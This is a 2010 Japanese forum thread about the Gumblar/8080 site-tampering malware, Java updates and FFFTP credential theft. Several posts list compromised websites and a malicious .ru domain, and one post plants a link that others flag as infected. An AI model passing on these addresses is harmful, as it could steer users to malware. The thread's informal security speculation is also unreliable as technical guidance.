URLリンク(www)<)●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter03/index●html
URLリンク(www)●jiwe●or●jp/Re-BeWeb/2008/autumn/chapter07/index●html
108:名無しさん@お腹いっぱい。
10/01/29 21:33:23
セキュリティソフトですが
Avast と MSのやつ だと どっちがいいですか?
109:名無しさん@お腹いっぱい。
10/01/29 21:37:01
>>108
たぶんavast、ただしまだv4の方がトラブルが少なく安定だと思う
MSEにはWeb監視機能が無い→発見したときは(実害は無くとも)すでに侵入されてる可能性
110:名無しさん@お腹いっぱい。
10/01/29 21:41:13
【so-netセキュリティ通信】
「ガンブラー」「サイト改ざん」めぐる基本のQ&A ~ 何が起きている? 対策は?
URLリンク(www.so-net.ne.jp)
※よくわかってない人は必読
サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
URLリンク(www.so-net.ne.jp)
サイト改ざん止まず(2) 改ざんサイト告知一覧(2010年1月14日~1月28日)
URLリンク(www.so-net.ne.jp)
DEBUG→.ru:XXXXには触れてないが、相変わらず早いなw
111:名無しさん@お腹いっぱい。
10/01/29 21:53:13
改ざんサイト 大手だけでなく同人・ファンサイトの公表はないのかな
112:名無しさん@お腹いっぱい。
10/01/29 21:56:09
>>111
so-netの所では
企業のサイトは(認めてる所は)公表するけど
個人のサイトは難しいのでは?
ここに晒すのもちょっとはばかれるけど、もし見つけたらどうしたものか・・・
113:名無しさん@お腹いっぱい。
10/01/29 21:57:20
同人の方もかなり感染してると思う
114:名無しさん@お腹いっぱい。
10/01/29 21:58:17
>>108
>>7をやって、今後も最新版がリリースされたら、すぐに最新版を
インストールするようにしてれば、どっちでもいいよ
115:名無しさん@お腹いっぱい。
10/01/29 21:59:05
>>108
それ以前に対策をしっかりしましょう
116:名無しさん@お腹いっぱい。
10/01/29 21:59:59
so-netはトレンドマイクロより優秀だな
117:へたれ発掘屋
10/01/29 22:03:12
>>107
そーゆー貼りかたやめれ。
1コ上の階層を調べてみませう。
あと、コードのタイプを書いておくと
最新型が大好物の検体提出屋さんが拾いやすくなる(はず)だから
可能ならタイプ(CODE1とかDEBUGとか)を書いてくれ。
>>99
勝手に命名してスマソ(仮名って書くの忘れた)
で、名無し最新型の呼び名はどうするよ?
118:名無しさん@お腹いっぱい。
10/01/29 22:11:50
>>117
so-netの無印で良くね
119:名無しさん@お腹いっぱい。
10/01/29 22:21:44
>>109
ありがとうございます、avaでいきます
>>114,115
そうですね、>>7チェックします
120:名無しさん@お腹いっぱい。
10/01/29 22:33:36
>>108
どっちもやめとけ
無料では歯がたたん(笑)
121:名無しさん@お腹いっぱい。
10/01/29 22:39:27
でたー有料厨
122:名無しさん@お腹いっぱい。
10/01/29 22:42:33
AVでは購入厨とは呼ばないのか
123:名無しさん@お腹いっぱい。
10/01/29 22:43:19
優劣は余所で議論しろ
124:名無しさん@お腹いっぱい。
10/01/29 22:44:02
でたーのは古事記なのか
125:名無しさん@お腹いっぱい。
10/01/29 22:49:31
URLリンク(1-noriba.net)
126:45
10/01/29 22:59:37
>>107
whoisよりめるぽ
127:名無しさん@お腹いっぱい。
10/01/29 23:17:21
知らん間に絶賛進化中かよ・・・すげぇなこの技術
真面目に使えばめちゃめちゃ儲けられるんじゃないのか。
128:名無しさん@お腹いっぱい。
10/01/29 23:20:22
こういう人らってケタ違いに儲けてるらしいよ
129:名無しさん@お腹いっぱい。
10/01/29 23:31:23
裏市場でケタ違いに儲けて、万が一逮捕されても出所後には腕を見込まれて有名セキュリティ関連企業に就職とかあるよなw
まあマルウェア作成者の逮捕なんてされる方が珍しいだろうけど
130:45
10/01/29 23:31:31
っと、また見逃し。。。
>>85
乙乙乙です!
はやく直ればいいのですが…
131:名無しさん@お腹いっぱい。
10/01/29 23:52:57
海外サイトでもGumblarって流行ってるのだろうか
132:名無しさん@お腹いっぱい。
10/01/30 00:09:35
仙台市災害ボランティアセンター
URLリンク(www)●ssvc●ne●jp/index●html (ru:X=DEBUG改)
未通報
133:名無しさん@お腹いっぱい。
10/01/30 00:13:41
URLリンク(www4.atpages.jp)
ここの3.に書かれてるNEC製パソコンは古いJavaが見えないってホント?
134:名無しさん@お腹いっぱい。
10/01/30 00:14:11
airseasite.ru
きりがないなぁ
135:名無しさん@お腹いっぱい。
10/01/30 00:43:09
>133
マジ
しかもアンインスコできない(最新版消すと古いのに書き戻される)
136:名無しさん@お腹いっぱい。
10/01/30 00:46:35
こいつ、まじでやっかいだな、いろいろとパターンをかえてきやがる
137:名無しさん@お腹いっぱい。
10/01/30 00:48:31
あやしいところは、チェッカー全部とおしてからみにいくんだな
138:名無しさん@お腹いっぱい。
10/01/30 00:50:10
どうやら新パターン構築中で沈静化してるみたいだな
139:名無しさん@お腹いっぱい。
10/01/30 00:55:44
>>133-135
!?
家族のノートPCはNECなんだが…
一応対策しとけと言っといたが駄目…なのかい
140:45
10/01/30 01:08:56
>>132
めるぽ
141:名無しさん@お腹いっぱい。
10/01/30 01:09:01
>>139
新しいJAVAいれとけば大丈夫
142:名無しさん@お腹いっぱい。
10/01/30 01:13:05
>139
コンパネいじる・JavaRa等の削除ツールを使うetc
いろいろ手はあるが確実性に欠けたり自己責任なんだよなあ
143:名無しさん@お腹いっぱい。
10/01/30 01:18:51
消せばコンパネからjavaが消えるなら問題ない
残るなら、あらかじめ仕込があるってことだから、神経質なひとは削除ツール使うしかない
144:名無しさん@お腹いっぱい。
10/01/30 01:21:53
>>139
とりあえず最新版入れれば、古いバージョンを決め打ちされない限り大丈夫のはず
出来れば決め打ちに備えて、古いバージョンは一掃したいけど…
145:139
10/01/30 01:23:32
ありがとう
細かいこと言ってもわからんだろうし俺がなんとかやるか…
146:142
10/01/30 01:31:33
>143
ごめん、言葉が足りなかったorz
消しても窓のコンパネにはがっつり残るんだよ>NEC
Java最新版のコンパネってか設定にバージョン管理する項目があるから
そこで古いバージョンのチェックを外せば回避できるかな?って思ったんだ
ROMに戻る、スマンカッタ
147:名無しさん@お腹いっぱい。
10/01/30 02:05:31
だから大手メーカーのPCは絶対買わないという人居るよな。
昔NとかFとかのメーカー、購入したときの情報が.txtで残っていて
JAVAとJavaスクリプトの組み合わせで読み取れて個人情報抜かれるなんて都市伝説あったなぁ。
スレチすまん。もう寝る。
148:名無しさん@お腹いっぱい。
10/01/30 02:09:43
古いjava消したらEclipseとNetBeansがおかしくなったでござる
149:名無しさん@お腹いっぱい。
10/01/30 02:13:25
javahome影響するんだっけか
150:名無しさん@お腹いっぱい。
10/01/30 02:26:23
JRE 1.5はこの前出たu22が最終なんだよな。
本当に1.5じゃないと動かないシステムを組んでいるところは、これ以上の新たな脆弱性が
発見されたときはどうするんだろうか。
151:名無しさん@お腹いっぱい。
10/01/30 02:35:54
くれくれで申し訳ないですが教えてください。
サーバからローカルにファイルをすべてコピーして
スクリプトの部分を一括置換で消そうとしたのですが
ファイルが開きません。
これは新種の亜種でしょうか。
通常のダブクリでもアプリからでも開けません。
今はhogehoge.htmlをhogehoge.txtにリネームして開いてます。
(この方法なら開けるんです)
ただファイル数が5000をこすので一括置換したいんです。
開く方法をご存知の方いらっしゃいましたら教えてください。
よろしくお願いしますorz
152:名無しさん@お腹いっぱい。
10/01/30 02:43:03
サーバ側にしかファイル残ってないの?
アップロードする前のファイルはどこへいったの?
オリジナルファイルがないってありえなくね?
153:名無しさん@お腹いっぱい。
10/01/30 02:44:16
あと開かないってのがどう開かないのかわからない
単に関連付けが変わっただけとかじゃなかろうか
エスパー先生おねがいします
154:名無しさん@お腹いっぱい。
10/01/30 02:46:00
>>152
ありがとうございます。
静的ページはオリジナルがあるのですが
CMSで生成されたページはサーバにしか残ってないんですorz
155:名無しさん@お腹いっぱい。
10/01/30 02:52:35
>>153
例えばメモ帳にドラッグ&ドロップすると「アクセスが拒否されました」とアラートが表示されます。
ドリウィで開こうとすると
「C;\Documents and ・・・・hogehoge.html へのアクセスは拒否されました」と表示されます。
156:名無しさん@お腹いっぱい。
10/01/30 03:27:29
「プロパティ」-「セキュリティ」タブでのアクセス許可すらいじれないようになってます
157:名無しさん@お腹いっぱい。
10/01/30 03:32:57
テキストファイルとして開けるのなら
置換機能のあるテキストエディタ使えばいいんじゃなかろうか
158:名無しさん@お腹いっぱい。
10/01/30 03:38:32
3000以上あるファイルの拡張子を全部txtにってのは最終手段だと思ってますorz
159:名無しさん@お腹いっぱい。
10/01/30 03:40:58
開けないファイルそれぞれがウイルスを内包している模様。ダブクリしたり開こうとするとアンチウイルスソフトから警告が出る。
160:名無しさん@お腹いっぱい。
10/01/30 03:43:02
5000もあるならファイルネーム一括置換でhtmlをtxtにリネーム
161:名無しさん@お腹いっぱい。
10/01/30 03:43:05
ウイルス名はJS/Obfuscated。ちなみにアンチウイルスソフトを切っても警告が出てこなくなるだけで、ファイルを開くことはできない。
162:名無しさん@お腹いっぱい。
10/01/30 03:47:16
Kaspersky Online Scannerのメンテナンス長すぎなんとかしろ
163:名無しさん@お腹いっぱい。
10/01/30 03:49:11
>>160
rename *.html *.txt
<<<
でbatを作ってリネームしたんですがbatファイルのあるフォルダにしか適用される下の階層のhtmlファイルなどの拡張子がそのままなんですorz
164:名無しさん@お腹いっぱい。
10/01/30 03:51:34
>>162
同感
165:名無しさん@お腹いっぱい。
10/01/30 03:52:03
リネームツールなんか山ほどあるんだから、ベクター辺りで探して見れ
166:名無しさん@お腹いっぱい。
10/01/30 03:53:41
古いバージョンのJREじゃないと不便って人は
もうブラウザの方でJAVAの実行を切っておくしかなさそうだな。
で、どうしても必要な時だけ手動でONにする、と。
167:名無しさん@お腹いっぱい。
10/01/30 03:55:46
えっ?
168:名無しさん@お腹いっぱい。
10/01/30 03:56:46
意味わかんない、ねー
169:名無しさん@お腹いっぱい。
10/01/30 03:56:57
えっ なにそれこわい
170:名無しさん@お腹いっぱい。
10/01/30 03:57:45
えっ なにそれ脆弱商売
171:名無しさん@お腹いっぱい。
10/01/30 04:00:18
自演乙
172:名無しさん@お腹いっぱい。
10/01/30 04:06:29
セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9%。これに対して中国の割合は26.5%。
過去の調査では世界2位になってしまった米国は今回、3位(10%弱)となった。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅した
にも関わらず、ロシアの生産量が落ちていないことを指摘している。
PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Network
がいなくなったところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
「結果として、過去にないくらい多くのウイルスやスパイウェアがロシアから出てきている。
そして、マルウェアの複雑さが増している」(Shevchenko氏)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織
よりも追跡しやすかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティング
サービスが、マレーシアや中国、パナマ、シンガポール、タイ、トルコ、インドのサーバに目を
向けている」
URLリンク(japan.zdnet.com)
173:名無しさん@お腹いっぱい。
10/01/30 04:14:05
名探偵コナンならあっさり
174:名無しさん@お腹いっぱい。
10/01/30 04:41:57
おせわになってます・・・トップページが書き換えられてる(忍者HP質問板)
URLリンク(csbbs.ninja.co.jp)
新パターンらしい
175:名無しさん@お腹いっぱい。
10/01/30 04:45:09
やる気!元気!井脇! ガハハ!
176:名無しさん@お腹いっぱい。
10/01/30 05:23:23
忍者って解析ツールのとこか
177:名無しさん@お腹いっぱい。
10/01/30 06:08:20
まとめ第9版
URLリンク(labs-uploader.sabaitiba.com)
PASS:virus
もう嫌だこのウイルス・・・(´・ω・`)
178:名無しさん@お腹いっぱい。
10/01/30 06:29:42
そういやJavaって以前は最新入れても思いっきり
古いver残ってたけど、Java6 Update12あたり?(うろ覚えだけど)
から一応「上書き」されて古いのは消えるようになってますよね。
Firefoxだと古いのは残って消す必要あるし、プラグイン怖い
WhiteListとか意味ねええええ
179:名無しさん@お腹いっぱい。
10/01/30 07:14:47
古いJAVA消してよかったんだな。ディスク容量が切迫してるとき
邪魔なんだよなって思ってたんだけどw
180:名無しさん@お腹いっぱい。
10/01/30 07:24:14
>>177
いつもありがとう、ご苦労様ですm(__)m
181:名無しさん@お腹いっぱい。
10/01/30 07:56:26
>>177
解凍後 tar.gz にてM$,ClamAvに送付。
182:名無しさん@お腹いっぱい。
10/01/30 08:01:07
俺のパソコンもNECだからかな? プログラムの追加と削除にJREが載ってない。
とりあえず>>2にあるjavaのバージョンチェックして、そこで出てきた最新版を
インストールしたんだけどこれで大丈夫なのかな? 情弱で申し訳ない。
183:182
10/01/30 08:06:12
上げてしまった。重ね重ね申し訳ない…
184:名無しさん@お腹いっぱい。
10/01/30 08:20:40
お絵ちゃ大好き!な腐まんこばっかりになってしまった
185:名無しさん@お腹いっぱい。
10/01/30 08:58:02
>>182
Secunia Personal Software Inspector (PSI) 1.5.0.1で
インストール済みのアプリが最新かどうか古いバージョンがあるかチェックするといいよ
URLリンク(secunia.com)
186:名無しさん@お腹いっぱい。
10/01/30 10:11:30
javara使えば古いものからゴミまで消してくれるでござる。
187:名無しさん@お腹いっぱい。
10/01/30 10:35:49
>>162
ニフティの方は使えたよ。(@niftyウイルスチェックサービス/中身はかすぺる)
本家がメンテしてるってことは新しいやつに対応してないのかもしらんが。
188:名無しさん@お腹いっぱい。
10/01/30 10:40:24
古いバージョンのJava Runtime Environmentはアンインストールしてもよい - @IT
URLリンク(www.atmarkit.co.jp)
2008/03/07
■ Java Runtime Environmentをアップデートすると、新しいバージョンが新規にインストールされる。
■ Java Runtime Environmentの容量はバージョンによっても異なるが、70Mbytes以上もある。
■ 古いバージョンのJava Runtime Environmentをアンインストールすれば、ハーディスクの空き容量を増やすことができる。
189:名無しさん@お腹いっぱい。
10/01/30 11:26:03
>>187
あれ、こないだやったらエラーで使えなかったぜnifty
190:名無しさん@お腹いっぱい。
10/01/30 11:40:42
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです
URLリンク(www.lifehacker.jp)
191:名無しさん@お腹いっぱい。
10/01/30 11:41:18
ニフティここずっと死んでるって話だったけど生き返ったのか
192:名無しさん@お腹いっぱい。
10/01/30 11:49:06
>>190
それ、ある意味凄いな
知名度があるってことか・・・
可能性
・単に知名度があったから
・犯人は日本に詳しい
・犯人は日本人
193:名無しさん@お腹いっぱい。
10/01/30 11:50:27
>>190
まじかよ。。
194:名無しさん@お腹いっぱい。
10/01/30 11:51:29
「白痴ランド」のトップにあるリンク先,GumblarChecker 2で検出
リストのうち,最後の三箇所
URLリンク(www)<)●hakuchi●jp/57577/
URLリンク(www)●hakuchi●jp/OTSUYA/
195:名無しさん@お腹いっぱい。
10/01/30 11:53:43
白濁ランドに見えた俺は病気
196:名無しさん@お腹いっぱい。
10/01/30 12:04:34
>>190
それ普通に使ってて、年末にJRE未更新状態で感染サイト踏まされたが
自サイト改ざんは未だなくスキャンでも何も出てこない
何故俺は助かったんだ…
197:名無しさん@お腹いっぱい。
10/01/30 12:23:44
>>195
えっち
198:名無しさん@お腹いっぱい。
10/01/30 12:32:04
>>190
まぁよく使われるFTP蔵なんてそんな数あるわけでもないんで
有名どころは網羅されてるんでねーの。
FileZilla、WinSCP、FTPExplorer、etc.
199:名無しさん@お腹いっぱい。
10/01/30 12:44:48
FTPプロトコルのキャプチャぐらいはしてるんじゃないかな?
だからFFFTPだけに限った話では無いわけで。
FFFTPだけだったら海外サイトまでなぜ感染するんだろうなあ、とか思ったり。
200:名無しさん@お腹いっぱい。
10/01/30 12:46:45
SFTPのおいらに隙はなかった
201:名無しさん@お腹いっぱい。
10/01/30 12:50:27
>>185
どうもありがとうございます。
ちなみにjavaの更新方法は間違ってないよね。確か6 Update 18ってのに更新したはずだけど…
202:名無しさん@お腹いっぱい。
10/01/30 12:57:07
>>199
いやFFFTPを起動していないのにサイトやられちゃったという話が出た
(FFFTPはレジストリかiniに保存する)ので驚いているわけで。
世界でおそらく最も使われているのはFileZillaで、これは前から
malwareにしょっちゅう抜かれてるんだけどね。
203:名無しさん@お腹いっぱい。
10/01/30 13:02:21
>>202
感染したPCの中を覗ける
204:名無しさん@お腹いっぱい。
10/01/30 13:08:55
>>202
なるほど、そういうことね。
ありがとう
205:名無しさん@お腹いっぱい。
10/01/30 13:26:01
>>202
マジでこえーよ
206:名無しさん@お腹いっぱい。
10/01/30 13:34:22
俺のnec lavie LR500/c(五年前)だと、java6 Updateをアンインストールすると
コンパネに残らないな
残る人の機種は何年前?
207:名無しさん@お腹いっぱい。
10/01/30 13:50:54
8080てなんて読むの?
ハチゼロハチゼロ
ハチマルハチマル
パオパオ
208:名無しさん@お腹いっぱい。
10/01/30 14:50:49
ハチレーハチレ-
で読んでるけど
209:名無しさん@お腹いっぱい。
10/01/30 14:53:17
>>189
何度か繰り返しやってたらできたよ
210:名無しさん@お腹いっぱい。
10/01/30 14:56:51
Java使うアプリってそんなにあるかな?
通常のネット閲覧ではあんまり使わないから余計な物は入れない方が良いと思う。
211:名無しさん@お腹いっぱい。
10/01/30 15:07:06
ガンブラー型ウイルス猛威、サイト改ざん悪質化
1月30日14時41分配信 読売新聞
URLリンク(headlines.yahoo.co.jp)
>新タイプでは、従来型と違い、クレジットカード番号を盗む仕組みが加わるなど、犯罪の意図が明確になってきているという。
これってネタ? マジ?
212:名無しさん@お腹いっぱい。
10/01/30 15:26:51
>ところが、この頃から今年にかけて“第3波”が来襲。今度は、不正サイトに誘導された後、偽のウイルス対策ソフトをインストールさせて、クレジットカード番号などを盗んだり、スパムメール(迷惑メール)配信に利用されたりする恐れがあるという。
Security Toolのことだろうからマジと言えばマジ
今は英語版しかないみたいだけど、日本語版でも出れば騙される人激増するだろうね
ここからは妄想だが、引っ張ってくるマルウェアにキーロガーが加わってくれば、Security Toolのようなフィッシングに近い形の盗み方と違って
PCで番号打っただけで盗むことは可能よね
213:名無しさん@お腹いっぱい。
10/01/30 15:38:13
>不正サイトに誘導された後
って書いてあった・・・ガンブラー本体じゃねえじゃん・・・
何だこの如何様記事
214:名無しさん@お腹いっぱい。
10/01/30 15:41:21
別に間違ってないけど
215:名無しさん@お腹いっぱい。
10/01/30 15:42:33
>>214
社員おつ
216:名無しさん@お腹いっぱい。
10/01/30 15:44:35
>不正サイトに誘導された後
ここが間違ってるような気がする。Security Toolって誘導というより8080系に感染したら自動的に引っ張ってきて強制インスコだったような・・・
それともこの記事はSecurity Toolとは別のこと言ってるんだろうか?
217:名無しさん@お腹いっぱい。
10/01/30 15:46:45
>>210
ミクシのアプリとか
218:名無しさん@お腹いっぱい。
10/01/30 15:46:50
で、FFFTPはアンインスコした方がいいの?
219:名無しさん@お腹いっぱい。
10/01/30 15:59:19
その記事にある「地方自治情報センター」の呼び掛け、説明文がGENO仕様なんだな。
後半が昨年秋の古い講演会資料の転載になってるから生じている問題なんだが、
普通のお花畑公務員は、それが最新の情報と勘違いするぞ。
多分センター自体がGENOと8080の違いについてわかってないんだろう。
文頭に別種と書いてはいるが、どう別種なのかわからないままの資料丸写しに見える。
大体、検知システムは来月から試行って段階だしな。
無料だが。
220:名無しさん@お腹いっぱい。
10/01/30 16:06:10
まあなんだ・・・持ち上げる気はないんだけど、So-netの記事が一番まとまってると思うよ
スレの最初から読む気が無い奴にはこのリンク出しときゃだいたい分かるだろ。まあそんな奴は長文読む気がない奴も多いのが問題だが・・・
「ガンブラー」「サイト改ざん」めぐる基本のQ&A ~ 何が起きている? 対策は?
URLリンク(www.so-net.ne.jp)
221:名無しさん@お腹いっぱい。
10/01/30 16:13:13
>>218
Sota's Web Page
"FFFTPをお使いの方に重要なお知らせ"
URLリンク(www2.biglobe.ne.jp)
222:名無しさん@お腹いっぱい。
10/01/30 16:17:17
警察や関係機関からの発表を丸書きするだけなのが新聞だよ。
当然 自分らで確認も理解もしてません。
223:名無しさん@お腹いっぱい。
10/01/30 16:17:46
公式で、実質アンインストール一択ってアナウンスがでたのか…
224:名無しさん@お腹いっぱい。
10/01/30 16:22:23
218ではないがアンインストールした
XPでソフトウェアの追加と削除から削除したら
>>221にある消去すべきとこ
HKEY_USERS\ユーザー識別番号\Software\Sota\FFFTP\Options \Host(n) : nは数字
が
HKEY_USERS\固有の番号\Software\Sota
までで以下ないけどこれでいいのかな
225:名無しさん@お腹いっぱい。
10/01/30 16:33:13
最新にしておけば>>221は消さなくても今のところOKですよね?
226:名無しさん@お腹いっぱい。
10/01/30 16:34:58
>>225
おまえがそう思うのならばそうなんだろう(AA略
227:名無しさん@お腹いっぱい。
10/01/30 16:35:44
主語抜けてて何が最新なのかまったく分からん
228:名無しさん@お腹いっぱい。
10/01/30 16:37:44
>>227
すまん>>2にあるやつ
229:名無しさん@お腹いっぱい。
10/01/30 16:37:57
136 名前:名無しさん@お腹いっぱい。[age] 投稿日:2010/01/30(土) 13:15:35 ID:TnywA9GR0
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性
URLリンク(www.lifehacker.jp)
Thanks and Farewell FFFTP
URLリンク(www3.atword.jp)
設定はiniに格納すればおk?
138 名前:名無しさん@お腹いっぱい。[] 投稿日:2010/01/30(土) 15:09:40 ID:IQxi/7CR0
>>136
うん、iniに保存で大丈夫。
レジストリ狙ったマルウェアが出てるだけだから。
アンインストール(笑)
139 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 15:22:07 ID:D0RKI4Os0
ウチのレジストリには、>>136のリンク先で示されてる項目が
ないんだけど、そーいうもん?
140 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/30(土) 15:31:26 ID:TnywA9GR0
>>138
ありがとー
自分はDドラにインスコして
CドラのOSは数回再インストールしてるから、
レジストリには何にもないよ>>139
。
なんだまだまだ使えるんじゃん、それをfarewellてwwwww
大丈夫かこいつら
230:名無しさん@お腹いっぱい。
10/01/30 16:41:19
iniファイルも標的にされてるのがわかってないんだろうな
FFFTPと心中するんだろう
231:名無しさん@お腹いっぱい。
10/01/30 16:45:26
>>228
心中したいならば、別にそれでかまわんよ、
このウィルスに感染しても個人サイトなら個人の問題だからね。
金かせぐ仕事でFFFTP使ってるなら、やめとけといっとく
232:名無しさん@お腹いっぱい。
10/01/30 16:47:45
対策とっても感染するときは感染するし、好きにすればよかろう
233:名無しさん@お腹いっぱい。
10/01/30 16:48:55
免責事項の明記と今回の告知で作者は十分に制作者責任を果たしているからな。
あとは何が起こっても完全に使う奴の自己責任だわ。
234:名無しさん@お腹いっぱい。
10/01/30 16:49:03
>>228
その対策を全部やってれば"今のところ"感染はしないのでFFFTP使ってても問題なし。"今のところ"はね
後、以前に一回感染してたんならパス変えなきゃ意味無い
でも、今回のに関係なくクライアント変更したりSSLなFTPとか別のプロトコルに変えたりIPでアクセス制限かけたりした方が無難だよね
鯖側が対応出来てれば、の話だけど
FTPのID/Pass盗み取るマルウェアは8080系だけじゃないんだから
まあFFFTPの作者さんのこういうアナウンスをするっていう決断は素晴らしいと思う
235:名無しさん@お腹いっぱい。
10/01/30 16:58:16
使ってるWebサーバのFTPは、SSL対応してないないな
FFFTPのレジストリ見たけどhistory01~04の項目もあって
IDPW入力した履歴が残ってるかも?
236:名無しさん@お腹いっぱい。
10/01/30 16:58:31
もうバージョンアップしないってことだから、どのみちFFFTPからは離れざるをえないけどな
237:名無しさん@お腹いっぱい。
10/01/30 17:01:50
今回の告知でわかることは、もう更新はないってことだからな>FFFTP
238:名無しさん@お腹いっぱい。
10/01/30 17:06:39
FileZilla,SmartFTPでおkだろ
239:名無しさん@お腹いっぱい。
10/01/30 17:12:19
FileZillaはPass保存してたら暗号化されずに平文で保存されてるぞ
FFFTPと同じ危険性がある…っていうかもう既にFileZillaから盗み取るやつあるんじゃなかったっけ…?
240:名無しさん@お腹いっぱい。
10/01/30 17:14:45
どのFTPツールが無難なのかね?
履歴にもIDPWが残るタイプだと危険かね
241:名無しさん@お腹いっぱい。
10/01/30 17:14:47
FFFTP削除してしまって、レジストリみてもFFFTPがないのですが、
初期設定だとINIファイルに保存設定になってるのですか?
それだと安心なのですが。インストールしたフォルダもなくなってて
確認のしようがないのですが。。。
242:名無しさん@お腹いっぱい。
10/01/30 17:15:34
ini保存もヤバいんかね。
つーか他にffftp相当の使いやすさで、SFTP対応で、日本語メニューで、アカウント情報が盗まれにくくて
というのが全て揃ったftpソフトって何があるかね?
243:名無しさん@お腹いっぱい。
10/01/30 17:17:58
>>241
初期設定はレジストリ
アンインスコをプログラムの追加と削除から行ったのなら、レジストリも恐らく消えてる。
レジストリから情報盗んでるとすると、完全に日本狙い撃ちされてるってことになるな。
244:名無しさん@お腹いっぱい。
10/01/30 17:18:13
>>242
ないものはつくるしかないと聞く
245:名無しさん@お腹いっぱい。
10/01/30 17:19:01
>>243
ありがとうございます、安心しました。
246:名無しさん@お腹いっぱい。
10/01/30 17:20:04
FFFTPはFileZillaと違って更新が途絶えて長いのと、日本での需要の高さから
格好の狩場として標的にされてる節がある
貧乏人はインターネットするな時代になりつつあるような
247:名無しさん@お腹いっぱい。
10/01/30 17:21:34
更新の長期停止されたFFFTP集中砲火とかよく調べてやがるな、このマルウェア製作者、
むかつくくらいだ
248:名無しさん@お腹いっぱい。
10/01/30 17:24:52
sftp使えってこった
249:名無しさん@お腹いっぱい。
10/01/30 17:25:30
それもソースコード解析して暗号化してたパス解読してるんだから…よくやるねぇ
それだけ稼げてるんだろな
250:名無しさん@お腹いっぱい。
10/01/30 17:26:00
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性があるそうです : ライフハッカー[日本版], 仕事も生活も上手くこなすライフハック情報満載のブログ・メディア
URLリンク(www.lifehacker.jp)
> 「UnderForge of Lack」では、消去すべきレジストリを記載してありますので、『FFFTP』のユーザーさんは、参考にして下さい。
URLリンク(www3.atword.jp)
> 代わりのFTPソフトとしては、『ALFTP』、『WinSCP』、有料ですが『NextFTP』(3ヶ月間の無料試用期間あり)などをどうぞ。
251:名無しさん@お腹いっぱい。
10/01/30 17:29:31
genoが出たときはここまで厄介なバージョンアップ遂げるとは思わなかったな
252:名無しさん@お腹いっぱい。
10/01/30 17:34:07
初代Gumblar(通称geno)と8080系はまったく違うものと言っても良いのに、バージョンアップと言うのはこれ如何に
作者も恐らく別人だろうし
253:名無しさん@お腹いっぱい。
10/01/30 17:36:43
フリーFTPソフト『FFFTP』に、8080系のマルウェア感染と同時にID・パスワードを取得される危険性
URLリンク(kasim.kashima136.com)
この辺も読んどいた方がいいかも。
254:名無しさん@お腹いっぱい。
10/01/30 17:39:39
>>253
お前最悪だな
おまえ等踏むなよ
255:名無しさん@お腹いっぱい。
10/01/30 17:40:58
>>253
危険
飛んだらダメ
FFFTPとは全く関係ない、8080系に感染済みサイト
念のためにスクリプト切っといて良かったw
256:名無しさん@お腹いっぱい。
10/01/30 17:43:48
感染~感染
257:名無しさん@お腹いっぱい。
10/01/30 17:46:10
だれか規制要請板に253通報してきてくれ
俺今出先で携帯なんで無理
これは悪質だ
258:名無しさん@お腹いっぱい。
10/01/30 18:07:41
危ない危険て言ってるけど、テキストブラウザで開けるようにしとけば
まず問題ないんでないの
それか通常ブラウザでもスクリプト類offにしとくとか
259:名無しさん@お腹いっぱい。
10/01/30 18:08:31
>>253
ひどいスパムサイトだな
260:名無しさん@お腹いっぱい。
10/01/30 18:13:10
いびきの原因
261:へたれ発掘屋
10/01/30 18:16:18
コードの微変更で発掘しにくくなってきちょりまつが・・・
皆様如何お過ごしでせうか?
とりあえず最新型っぽいのを1件投下
「BAL BAL NET」
URLリンク(www)●balbal●net/
※サイト内全滅の予感
つーほー&検体提出ヨロ
262:名無しさん@お腹いっぱい。
10/01/30 18:23:59
γ⌒ヽ
< ・、,,,;;,) ハ,,..,,ハ
< つ=つ /;;・ω・;;ヽ
ノ ノ三) (;( ^^^ );)
∠、 m)=m).. `'ー---‐´
ガンブラー トトロイ
(2009 ~ ) (2010 ~ )
263:名無しさん@お腹いっぱい。
10/01/30 18:29:49
FFFTP並みに簡単なソフトないよな。
開発続けて欲しいわ。
264:名無しさん@お腹いっぱい。
10/01/30 18:30:37
>>261
二段目のスクリプトの中身がNothingになっていた件ww
265:名無しさん@お腹いっぱい。
10/01/30 18:32:19 BE:1609363788-PLT(12031)
FFFTP使ってるとかどんな情弱
FTPクライアントはFireFTP使ってる
266:名無しさん@お腹いっぱい。
10/01/30 18:43:01
>>261
おつ!
シマンテックに提出しました。
とりあえずVirSCANの結果
URLリンク(www.virscan.org)
267:名無しさん@お腹いっぱい。
10/01/30 18:46:25
他のFTP使っても結局レジストリかiniファイルに保存されてしまうから危険度は変わらないよね
268:名無しさん@お腹いっぱい。
10/01/30 18:52:50
【FFFTP】 FTP接続時のパスワードが抜き取られサイトの改竄相次ぐ 【Gumblarウイルス】
スレリンク(news板)
269:名無しさん@お腹いっぱい。
10/01/30 18:54:29
暗号化されてれば危険度は減るがな
270:名無しさん@お腹いっぱい。
10/01/30 18:59:27
FFFTPもパスワードは暗号化されてレジストリに登録されてたけど解析済みなんだっけ?
271:名無しさん@お腹いっぱい。
10/01/30 18:59:53
>>267
有名ソフトほど狙われやすい
マイナーソフト使えば使うほど狙われにくい
FFFTPがいちばん日本で普及してるから狙われたんじゃね?
おれはSFTP使えるWinSCPメインだけど
272:名無しさん@お腹いっぱい。
10/01/30 19:00:04
ホームページビルダーは大丈夫?
273:名無しさん@お腹いっぱい。
10/01/30 19:01:50
>>270
一般的なソフトのパスワード保存って、
もしくは簡単な独自アルゴリズムで暗号化・複合してる、
